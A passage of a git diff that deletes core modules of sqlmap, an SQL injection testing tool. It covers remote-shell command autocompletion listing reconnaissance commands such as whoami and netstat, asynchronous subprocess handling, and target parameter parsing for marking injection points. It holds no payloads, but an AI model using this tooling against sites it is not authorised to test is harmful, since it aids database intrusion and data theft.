AUTOCOMPLETE_TYPE.SQL: - historyPath = paths.SQL_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.OS: - historyPath = paths.OS_SHELL_HISTORY - else: - historyPath = paths.SQLMAP_SHELL_HISTORY - - if os.path.exists(historyPath): - try: - readline.read_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem loading the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) - -def autoCompletion(completion=None, os=None, commands=None): - if not readlineAvailable(): - return - - if completion == AUTOCOMPLETE_TYPE.OS: - if os == OS.WINDOWS: - # Reference: http://en.wikipedia.org/wiki/List_of_DOS_commands - completer = CompleterNG({ - "copy": None, "del": None, "dir": None, - "echo": None, "md": None, "mem": None, - "move": None, "net": None, "netstat -na": None, - "ver": None, "xcopy": None, "whoami": None, - }) - - else: - # Reference: http://en.wikipedia.org/wiki/List_of_Unix_commands - completer = CompleterNG({ - "cp": None, "rm": None, "ls": None, - "echo": None, "mkdir": None, "free": None, - "mv": None, "ifconfig": None, 
"netstat -natu": None, - "pwd": None, "uname": None, "id": None, - }) - - readline.set_completer(completer.complete) - readline.parse_and_bind("tab: complete") - - elif commands: - completer = CompleterNG(dict(((_, None) for _ in commands))) - readline.set_completer_delims(' ') - readline.set_completer(completer.complete) - readline.parse_and_bind("tab: complete") - - loadHistory(completion) - atexit.register(saveHistory, completion) diff --git a/lib/core/subprocessng.py b/lib/core/subprocessng.py deleted file mode 100644 index 236469a1..00000000 --- a/lib/core/subprocessng.py +++ /dev/null @@ -1,202 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import errno -import os -import subprocess -import sys -import time - -from lib.core.settings import IS_WIN - -if IS_WIN: - try: - from win32file import ReadFile, WriteFile - from win32pipe import PeekNamedPipe - except ImportError: - pass - import msvcrt -else: - import select - import fcntl - - if (sys.hexversion >> 16) >= 0x202: - FCNTL = fcntl - else: - import FCNTL - -def blockingReadFromFD(fd): - # Quick twist around original Twisted function - # Blocking read from a non-blocking file descriptor - output = "" - - while True: - try: - output += os.read(fd, 8192) - except (OSError, IOError), ioe: - if ioe.args[0] in (errno.EAGAIN, errno.EINTR): - # Uncomment the following line if the process seems to - # take a huge amount of cpu time - # time.sleep(0.01) - continue - else: - raise - break - - if not output: - raise EOFError("fd %s has been closed." 
% fd) - - return output - -def blockingWriteToFD(fd, data): - # Another quick twist - while True: - try: - data_length = len(data) - wrote_data = os.write(fd, data) - except (OSError, IOError), io: - if io.errno in (errno.EAGAIN, errno.EINTR): - continue - else: - raise - - if wrote_data < data_length: - blockingWriteToFD(fd, data[wrote_data:]) - - break - -# the following code is taken from http://code.activestate.com/recipes/440554-module-to-allow-asynchronous-subprocess-use-on-win/ -class Popen(subprocess.Popen): - def recv(self, maxsize=None): - return self._recv('stdout', maxsize) - - def recv_err(self, maxsize=None): - return self._recv('stderr', maxsize) - - def send_recv(self, input='', maxsize=None): - return self.send(input), self.recv(maxsize), self.recv_err(maxsize) - - def get_conn_maxsize(self, which, maxsize): - if maxsize is None: - maxsize = 1024 - elif maxsize < 1: - maxsize = 1 - return getattr(self, which), maxsize - - def _close(self, which): - getattr(self, which).close() - setattr(self, which, None) - - if subprocess.mswindows: - def send(self, input): - if not self.stdin: - return None - - try: - x = msvcrt.get_osfhandle(self.stdin.fileno()) - (errCode, written) = WriteFile(x, input) - except ValueError: - return self._close('stdin') - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): - return self._close('stdin') - raise - - return written - - def _recv(self, which, maxsize): - conn, maxsize = self.get_conn_maxsize(which, maxsize) - if conn is None: - return None - - try: - x = msvcrt.get_osfhandle(conn.fileno()) - (read, nAvail, nMessage) = PeekNamedPipe(x, 0) - if maxsize < nAvail: - nAvail = maxsize - if nAvail > 0: - (errCode, read) = ReadFile(x, nAvail, None) - except (ValueError, NameError): - return self._close(which) - except (subprocess.pywintypes.error, Exception), why: - if why[0] in (109, errno.ESHUTDOWN): - return self._close(which) - raise - - if self.universal_newlines: - read = 
self._translate_newlines(read) - return read - else: - def send(self, input): - if not self.stdin: - return None - - if not select.select([], [self.stdin], [], 0)[1]: - return 0 - - try: - written = os.write(self.stdin.fileno(), input) - except OSError, why: - if why[0] == errno.EPIPE: # broken pipe - return self._close('stdin') - raise - - return written - - def _recv(self, which, maxsize): - conn, maxsize = self.get_conn_maxsize(which, maxsize) - if conn is None: - return None - - flags = fcntl.fcntl(conn, fcntl.F_GETFL) - if not conn.closed: - fcntl.fcntl(conn, fcntl.F_SETFL, flags | os.O_NONBLOCK) - - try: - if not select.select([conn], [], [], 0)[0]: - return '' - - r = conn.read(maxsize) - if not r: - return self._close(which) - - if self.universal_newlines: - r = self._translate_newlines(r) - return r - finally: - if not conn.closed: - fcntl.fcntl(conn, fcntl.F_SETFL, flags) - -def recv_some(p, t=.1, e=1, tr=5, stderr=0): - if tr < 1: - tr = 1 - x = time.time() + t - y = [] - r = '' - if stderr: - pr = p.recv_err - else: - pr = p.recv - while time.time() < x or r: - r = pr() - if r is None: - break - elif r: - y.append(r) - else: - time.sleep(max((x - time.time()) / tr, 0)) - return ''.join(y) - -def send_all(p, data): - if not data: - return - - while len(data): - sent = p.send(data) - if not isinstance(sent, int): - break - data = buffer(data, sent) diff --git a/lib/core/target.py b/lib/core/target.py deleted file mode 100644 index 286cb278..00000000 --- a/lib/core/target.py +++ /dev/null @@ -1,722 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import functools -import os -import re -import tempfile -import time -import urlparse - -from lib.core.common import Backend -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import hashDBRetrieve -from lib.core.common import 
intersect -from lib.core.common import normalizeUnicode -from lib.core.common import openFile -from lib.core.common import paramToDict -from lib.core.common import readInput -from lib.core.common import resetCookieJar -from lib.core.common import urldecode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import mergedOptions -from lib.core.data import paths -from lib.core.datatype import InjectionDict -from lib.core.dicts import DBMS_DICT -from lib.core.dump import dumper -from lib.core.enums import HASHDB_KEYS -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import PLACE -from lib.core.enums import POST_HINT -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSystemException -from lib.core.exception import SqlmapUserQuitException -from lib.core.option import _setDBMS -from lib.core.option import _setKnowledgeBaseAttributes -from lib.core.option import _setAuthCred -from lib.core.settings import ASTERISK_MARKER -from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import HOST_ALIASES -from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX -from lib.core.settings import JSON_RECOGNITION_REGEX -from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX -from lib.core.settings import MULTIPART_RECOGNITION_REGEX -from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS -from lib.core.settings import REFERER_ALIASES -from lib.core.settings import RESTORE_MERGED_OPTIONS -from lib.core.settings import RESULTS_FILE_FORMAT -from lib.core.settings import SUPPORTED_DBMS -from lib.core.settings import UNENCODED_ORIGINAL_VALUE -from lib.core.settings 
import UNICODE_ENCODING -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import USER_AGENT_ALIASES -from lib.core.settings import XML_RECOGNITION_REGEX -from lib.utils.hashdb import HashDB -from lib.core.xmldump import dumper as xmldumper -from thirdparty.odict.odict import OrderedDict - -def _setRequestParams(): - """ - Check and set the parameters and perform checks on 'data' option for - HTTP method POST. - """ - - if conf.direct: - conf.parameters[None] = "direct connection" - return - - testableParameters = False - - # Perform checks on GET parameters - if conf.parameters.get(PLACE.GET): - parameters = conf.parameters[PLACE.GET] - paramDict = paramToDict(PLACE.GET, parameters) - - if paramDict: - conf.paramDict[PLACE.GET] = paramDict - testableParameters = True - - # Perform checks on POST parameters - if conf.method == HTTPMETHOD.POST and conf.data is None: - logger.warn("detected empty POST body") - conf.data = "" - - if conf.data is not None: - conf.method = HTTPMETHOD.POST if not conf.method or conf.method == HTTPMETHOD.GET else conf.method - hintNames = [] - - def process(match, repl): - retVal = match.group(0) - - if not (conf.testParameter and match.group("name") not in conf.testParameter): - retVal = repl - while True: - _ = re.search(r"\\g<([^>]+)>", retVal) - if _: - retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1))) - else: - break - if CUSTOM_INJECTION_MARK_CHAR in retVal: - hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name"))) - return retVal - - if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data: - message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR - message += "'--data'. Do you want to process it? 
[Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - kb.processUserMarks = not test or test[0] not in ("n", "N") - - if kb.processUserMarks: - kb.testOnlyCustom = True - - if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data): - if re.search(JSON_RECOGNITION_REGEX, conf.data): - message = "JSON data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data) - conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data) - match = re.search(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data) - if match and not (conf.testParameter and match.group("name") not in conf.testParameter): - _ = match.group(2) - _ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _) - _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _) - conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) - kb.postHint = POST_HINT.JSON - - elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): - message = "JSON-like data found in %s data. " % conf.method - message += "Do you want to process it? 
[Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"('(?P[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - conf.data = re.sub(r"('(?P[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.JSON_LIKE - - elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): - message = "Array-like data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data) - kb.postHint = POST_HINT.ARRAY_LIKE - - elif re.search(XML_RECOGNITION_REGEX, conf.data): - message = "SOAP/XML data found in %s data. " % conf.method - message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML - - elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): - message = "Multipart-like data found in %s data. " % conf.method - message += "Do you want to process it? 
[Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER) - conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data) - kb.postHint = POST_HINT.MULTIPART - - if not kb.postHint: - if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed - pass - else: - place = PLACE.POST - - conf.parameters[place] = conf.data - paramDict = paramToDict(place, conf.data) - - if paramDict: - conf.paramDict[place] = paramDict - testableParameters = True - else: - if CUSTOM_INJECTION_MARK_CHAR not in conf.data: # in case that no usable parameter values has been found - conf.parameters[PLACE.POST] = conf.data - - kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks - - if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"): - warnMsg = "you've provided target URL without any GET " - warnMsg += "parameters (e.g. www.site.com/article.php?id=1) " - warnMsg += "and without providing any POST parameters " - warnMsg += "through --data option" - logger.warn(warnMsg) - - message = "do you want to try URI injections " - message += "in the target URL itself? 
[Y/n/q] " - test = readInput(message, default="Y") - - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - elif not test or test[0] not in ("n", "N"): - conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) - kb.processUserMarks = True - - for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): - _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" - if CUSTOM_INJECTION_MARK_CHAR in _: - if kb.processUserMarks is None: - lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} - message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR - message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - kb.processUserMarks = not test or test[0] not in ("n", "N") - - if kb.processUserMarks: - kb.testOnlyCustom = True - - if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _: - warnMsg = "it seems that you've provided empty parameter value(s) " - warnMsg += "for testing. 
Please, always use only valid parameter values " - warnMsg += "so sqlmap could be able to run properly" - logger.warn(warnMsg) - - if not kb.processUserMarks: - if place == PLACE.URI: - query = urlparse.urlsplit(value).query - if query: - parameters = conf.parameters[PLACE.GET] = query - paramDict = paramToDict(PLACE.GET, parameters) - - if paramDict: - conf.url = conf.url.split('?')[0] - conf.paramDict[PLACE.GET] = paramDict - testableParameters = True - elif place == PLACE.CUSTOM_POST: - conf.parameters[PLACE.POST] = conf.data - paramDict = paramToDict(PLACE.POST, conf.data) - - if paramDict: - conf.paramDict[PLACE.POST] = paramDict - testableParameters = True - - else: - conf.parameters[place] = value - conf.paramDict[place] = OrderedDict() - - if place == PLACE.CUSTOM_HEADER: - for index in xrange(len(conf.httpHeaders)): - header, value = conf.httpHeaders[index] - if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value): - parts = value.split(CUSTOM_INJECTION_MARK_CHAR) - for i in xrange(len(parts) - 1): - conf.paramDict[place]["%s #%d%s" % (header, i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))) - conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) - else: - parts = value.split(CUSTOM_INJECTION_MARK_CHAR) - - for i in xrange(len(parts) - 1): - name = None - if kb.postHint: - for ending, _ in hintNames: - if parts[i].endswith(ending): - name = "%s %s" % (kb.postHint, _) - break - if name is None: - name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR) - conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))) - - if place == PLACE.URI and PLACE.GET in conf.paramDict: - del conf.paramDict[PLACE.GET] - elif place == PLACE.CUSTOM_POST and PLACE.POST in conf.paramDict: - 
del conf.paramDict[PLACE.POST] - - testableParameters = True - - if kb.processUserMarks: - for item in ("url", "data", "agent", "referer", "cookie"): - if conf.get(item): - conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "") - - # Perform checks on Cookie parameters - if conf.cookie: - conf.parameters[PLACE.COOKIE] = conf.cookie - paramDict = paramToDict(PLACE.COOKIE, conf.cookie) - - if paramDict: - conf.paramDict[PLACE.COOKIE] = paramDict - testableParameters = True - - # Perform checks on header values - if conf.httpHeaders: - for httpHeader, headerValue in list(conf.httpHeaders): - # Url encoding of the header values should be avoided - # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - - if httpHeader.title() == HTTP_HEADER.USER_AGENT: - conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) - - condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) - - if condition: - conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue} - testableParameters = True - - elif httpHeader.title() == HTTP_HEADER.REFERER: - conf.parameters[PLACE.REFERER] = urldecode(headerValue) - - condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) - - if condition: - conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} - testableParameters = True - - elif httpHeader.title() == HTTP_HEADER.HOST: - conf.parameters[PLACE.HOST] = urldecode(headerValue) - - condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) - - if condition: - conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} - testableParameters = True - - else: - condition = intersect(conf.testParameter, [httpHeader], True) - - if condition: - conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) - conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)} 
- conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders] - testableParameters = True - - if not conf.parameters: - errMsg = "you did not provide any GET, POST and Cookie " - errMsg += "parameter, neither an User-Agent, Referer or Host header value" - raise SqlmapGenericException(errMsg) - - elif not testableParameters: - errMsg = "all testable parameters you provided are not present " - errMsg += "within the given request data" - raise SqlmapGenericException(errMsg) - - if conf.csrfToken: - if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}): - errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken - errMsg += "found in provided GET, POST, Cookie or header values" - raise SqlmapGenericException(errMsg) - else: - for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE): - for parameter in conf.paramDict.get(place, {}): - if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): - message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter) - message += "Do you want sqlmap to automatically update it in further requests? [y/N] " - test = readInput(message, default="N") - if test and test[0] in ("y", "Y"): - conf.csrfToken = parameter - break - -def _setHashDB(): - """ - Check and set the HashDB SQLite file for query resume functionality. 
- """ - - if not conf.hashDBFile: - conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite") - - if os.path.exists(conf.hashDBFile): - if conf.flushSession: - try: - os.remove(conf.hashDBFile) - logger.info("flushing session file") - except OSError, msg: - errMsg = "unable to flush the session file (%s)" % msg - raise SqlmapFilePathException(errMsg) - - conf.hashDB = HashDB(conf.hashDBFile) - -def _resumeHashDBValues(): - """ - Resume stored data values from HashDB - """ - - kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths - kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables - kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns - kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars - kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings - kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable - - kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) - if kb.errorChunkLength and kb.errorChunkLength.isdigit(): - kb.errorChunkLength = int(kb.errorChunkLength) - else: - kb.errorChunkLength = None - - conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) - - for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: - if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \ - injection.parameter in conf.paramDict[injection.place]: - - if not conf.tech or intersect(conf.tech, injection.data.keys()): - if intersect(conf.tech, injection.data.keys()): - injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items())) - - if injection not in kb.injections: - kb.injections.append(injection) - - _resumeDBMS() - _resumeOS() - -def _resumeDBMS(): - """ - Resume stored DBMS information from HashDB - """ - - value = 
hashDBRetrieve(HASHDB_KEYS.DBMS) - - if not value: - return - - dbms = value.lower() - dbmsVersion = [UNKNOWN_DBMS_VERSION] - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search(r"\A%s (.*)" % _, dbms, re.I) - - if _: - dbms = _.group(1).lower() - dbmsVersion = [_.group(2)] - - if conf.dbms: - check = True - for aliases, _, _, _ in DBMS_DICT.values(): - if conf.dbms.lower() in aliases and dbms not in aliases: - check = False - break - - if not check: - message = "you provided '%s' as a back-end DBMS, " % conf.dbms - message += "but from a past scan information on the target URL " - message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms - message += "Do you really want to force the back-end " - message += "DBMS value? [y/N] " - test = readInput(message, default="N") - - if not test or test[0] in ("n", "N"): - conf.dbms = None - Backend.setDbms(dbms) - Backend.setVersionList(dbmsVersion) - else: - infoMsg = "resuming back-end DBMS '%s' " % dbms - logger.info(infoMsg) - - Backend.setDbms(dbms) - Backend.setVersionList(dbmsVersion) - -def _resumeOS(): - """ - Resume stored OS information from HashDB - """ - - value = hashDBRetrieve(HASHDB_KEYS.OS) - - if not value: - return - - os = value - - if os and os != 'None': - infoMsg = "resuming back-end DBMS operating system '%s' " % os - logger.info(infoMsg) - - if conf.os and conf.os.lower() != os.lower(): - message = "you provided '%s' as back-end DBMS operating " % conf.os - message += "system, but from a past scan information on the " - message += "target URL sqlmap assumes the back-end DBMS " - message += "operating system is %s. " % os - message += "Do you really want to force the back-end DBMS " - message += "OS value? [y/N] " - test = readInput(message, default="N") - - if not test or test[0] in ("n", "N"): - conf.os = os - else: - conf.os = os - - Backend.setOs(conf.os) - -def _setResultsFile(): - """ - Create results file for storing results of running in a - multiple target mode. 
- """ - - if not conf.multipleTargets: - return - - if not conf.resultsFP: - conf.resultsFilename = os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower()) - try: - conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) - except (OSError, IOError), ex: - try: - warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex)) - conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1] - conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) - warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename - logger.warn(warnMsg) - except IOError, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep) - - logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) - -def _createFilesDir(): - """ - Create the file directory. - """ - - if not conf.rFile: - return - - conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname - - if not os.path.isdir(conf.filePath): - try: - os.makedirs(conf.filePath, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix="sqlmapfiles") - warnMsg = "unable to create files directory " - warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - conf.filePath = tempDir - -def _createDumpDir(): - """ - Create the dump directory. 
- """ - - if not conf.dumpTable and not conf.dumpAll and not conf.search: - return - - conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname - - if not os.path.isdir(conf.dumpPath): - try: - os.makedirs(conf.dumpPath, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix="sqlmapdump") - warnMsg = "unable to create dump directory " - warnMsg += "'%s' (%s). " % (conf.dumpPath, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - conf.dumpPath = tempDir - -def _configureDumper(): - if hasattr(conf, 'xmlFile') and conf.xmlFile: - conf.dumper = xmldumper - else: - conf.dumper = dumper - - conf.dumper.setOutputFile() - -def _createTargetDirs(): - """ - Create the output directory. - """ - - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - try: - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) - warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH - logger.warn(warnMsg) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - warnMsg = "unable to create regular output directory " - warnMsg += "'%s' (%s). 
" % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) - - paths.SQLMAP_OUTPUT_PATH = tempDir - - conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) - - if not os.path.isdir(conf.outputPath): - try: - os.makedirs(conf.outputPath, 0755) - except (OSError, IOError), ex: - try: - tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") - except Exception, _: - errMsg = "unable to write to the temporary directory ('%s'). " % _ - errMsg += "Please make sure that your disk is not full and " - errMsg += "that you have sufficient write permissions to " - errMsg += "create temporary files and/or directories" - raise SqlmapSystemException(errMsg) - - warnMsg = "unable to create output directory " - warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex)) - warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) - logger.warn(warnMsg) - - conf.outputPath = tempDir - - try: - with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: - f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) - f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) - if conf.data: - f.write("\n\n%s" % getUnicode(conf.data)) - except IOError, ex: - if "denied" in getUnicode(ex): - errMsg = "you don't have enough permissions " - else: - errMsg = "something went wrong while trying " - errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) - - raise SqlmapMissingPrivileges(errMsg) - - 